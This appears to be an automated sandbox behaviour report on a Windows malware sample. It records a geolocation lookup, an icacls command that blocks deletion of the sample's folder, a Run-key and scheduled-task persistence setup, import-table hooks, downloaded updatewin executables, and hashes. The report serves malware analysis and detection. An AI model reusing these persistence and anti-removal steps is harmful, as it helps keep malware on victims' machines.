Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-19 06:57:22 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 14836974376 True 1
Fn
Get Time type = Ticks, time = 99466 True 84
Fn
Get Time type = Ticks, time = 99481 True 149
Fn
Get Time type = Ticks, time = 99497 True 16
Fn
Get Time type = System Time, time = 2019-07-19 06:57:24 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15433291160 True 1
Fn
Get Time type = System Time, time = 2019-07-19 06:57:29 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.12 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.12 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: icacls.exe
0 0
»
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:00:44, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x994
Parent PID 0x8d4 (c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 998
0x 99C
Process #4: taskeng.exe
0 0
»
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:42, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:23
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x50c
Parent PID 0x36c (Unknown)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 97C
0x 660
0x 578
0x 574
0x 520
0x 514
0x 510
Process #5: ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
876 15
»
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0x8d4 (c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9A8
0x 9B0
0x 9B4
0x 9B8
0x 9BC
0x 9C0
0x 9C4
0x 9C8
0x 9CC
0x 9D0
0x 9D4
0x 9F8
0x 9FC
0x A08
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000d50000:+0x5d1af 1. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:SetPrivateObjectSecurity+0x0 now points to private_0x000000007fff0000:+0x47c13324
IAT private_0x0000000000d50000:+0x5d1af 2. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:PrivilegedServiceAuditAlarmA+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000d50000:+0x5d1af 3. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:LockServiceDatabase+0x0 now points to private_0x000000007fff0000:+0x7f6b0000
IAT private_0x0000000000d50000:+0x5d1af 7. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:SetMapMode+0x0 now points to pagefile_0x0000000001190000:+0xcf0689
IAT private_0x0000000000d50000:+0x5d1af 8. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:GetOutlineTextMetricsA+0x0 now points to private_0x000000007fff0000:+0xb00ffad
IAT private_0x0000000000d50000:+0x5d1af 12. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x3097589
IAT private_0x0000000000d50000:+0x5d1af 13. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateMailslotA+0x0 now points to private_0x000000007fff0000:+0x3eec1cc7
IAT private_0x0000000000d50000:+0x5d1af 14. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to private_0x000000007fff0000:+0xbed758b
IAT private_0x0000000000d50000:+0x5d1af 15. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCurrentDirectoryA+0x0 now points to private_0x000000007fff0000:+0x773c087d
IAT private_0x0000000000d50000:+0x5d1af 16. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x000000007fff0000:+0x7f8c0f74
IAT private_0x0000000000d50000:+0x5d1af 17. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetNumberFormatW+0x0 now points to private_0x000000007fff0000:+0x7ccbe856
IAT private_0x0000000000d50000:+0x5d1af 18. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:PeekConsoleInputW+0x0 now points to private_0x000000007fff0000:+0x4684ffff
IAT private_0x0000000000d50000:+0x5d1af 19. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to rpcrt4.dll:I_RpcBindingInqDynamicEndpointA+0x12f62
IAT private_0x0000000000d50000:+0x5d1af 27. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x4ccdccc3
IAT private_0x0000000000d50000:+0x5d1af 28. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 29. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetHandleInformation+0x0 now points to private_0x000000007fff0000:+0x3f38b56
IAT private_0x0000000000d50000:+0x5d1af 31. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LockFile+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000d50000:+0x5d1af 33. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000d50000:+0x5d1af 34. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:VirtualProtect+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000d50000:+0x5d1af 35. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetBinaryTypeA+0x0 now points to private_0x000000007fff0000:+0x40340000
IAT private_0x0000000000d50000:+0x5d1af 36. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x0000000000090000:+0x746c7
IAT private_0x0000000000d50000:+0x5d1af 38. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x435f0689
IAT private_0x0000000000d50000:+0x5d1af 39. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 40. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 41. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d50000:+0x5d1af 43. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x78d2012b
IAT private_0x0000000000d50000:+0x5d1af 45. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d50000:+0x5d1af 47. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x425e012b
IAT private_0x0000000000d50000:+0x5d1af 48. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x4ccd0004
IAT private_0x0000000000d50000:+0x5d1af 49. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d50000:+0x5d1af 51. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x78d2012b
IAT private_0x0000000000d50000:+0x5d1af 53. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d50000:+0x5d1af 55. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x425e012b
IAT private_0x0000000000d50000:+0x5d1af 56. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x4ccd0004
IAT private_0x0000000000d50000:+0x5d1af 58. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x309758b
IAT private_0x0000000000d50000:+0x5d1af 60. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000d50000:+0x5d1af 62. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000d50000:+0x5d1af 63. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000d50000:+0x5d1af 64. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x40340000
IAT private_0x0000000000d50000:+0x5d1af 65. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x0000000000090000:+0x746c7
IAT private_0x0000000000d50000:+0x5d1af 68. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x4c0104c2
IAT private_0x0000000000d50000:+0x5d1af 69. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d50000:+0x5d1af 70. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to private_0x000000007fff0000:+0x75e9084d
IAT private_0x0000000000d50000:+0x5d1af 72. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x4c0104c2
IAT private_0x0000000000d50000:+0x5d1af 75. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to private_0x000000007fff0000:+0x21650044
IAT private_0x0000000000d50000:+0x5d1af 80. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x47f14d89
IAT private_0x0000000000d50000:+0x5d1af 82. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x49860000
IAT private_0x0000000000d50000:+0x5d1af 84. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x75efe80c
IAT private_0x0000000000d50000:+0x5d1af 88. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:EnumPropsW+0x0 now points to private_0x000000007fff0000:+0x425ee58b
IAT private_0x0000000000d50000:+0x5d1af 89. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:SendMessageA+0x0 now points to private_0x000000007fff0000:+0x4ccd0008
IAT private_0x0000000000d50000:+0x5d1af 90. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:ChangeDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 91. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:LoadStringW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 92. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:GetClassInfoW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d50000:+0x5d1af 94. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:DrawIcon+0x0 now points to private_0x000000007fff0000:+0x309758b
IAT private_0x0000000000d50000:+0x5d1af 96. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:CreateDialogParamW+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000d50000:+0x5d1af 98. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes winhttp.dll:WinHttpWriteData+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000d50000:+0x5d1af 99. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes winhttp.dll:WinHttpQueryDataAvailable+0x0 now points to private_0x0000000000090000:+0x61446
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\SystemID\PersonalID.txt 42 bytes MD5: a63f5ce769bf3a5cbb9dc6457e532556
SHA1: a74920735ecff88afbb805d4c5a41483de1702d6
SHA256: 2c1486282492a2479970952c41779d6c6410324a64eba461522221614fc8737a
SSDeep: 3:iJifPDNWRUqAyn:nHBWUon
False
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\get[1].php 103 bytes MD5: 2de91b6400ae2adcbf96b3c56b69afae
SHA1: 4311a6972fb13173212ae0125ad283970b91c43f
SHA256: 4eb5327e8d2d781d323da8c6214f389d54bae4e801a232acb48304cf3384814a
SSDeep: 3:YJMLAAul/qx/To0k/qtojjJCH9PMifPDNWRUqA4:YIc/qJs0k/qtoEdfHBWUG
False
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 143, domain = 143, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-07-19T16:58:15 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (98)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\SystemID\PersonalID.txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\SystemID\PersonalID.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff - True 1
Fn
Create Directory C:\SystemID - True 1
Fn
Get Info C:\SystemID\PersonalID.txt type = file_type True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe size = 2560 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe size = 4608 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe size = 7680 True 1
Fn
Data
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (49)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe show_window = SW_SHOWNORMAL True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\microsoft office\messages.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows journal\assistant_lesson_love.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
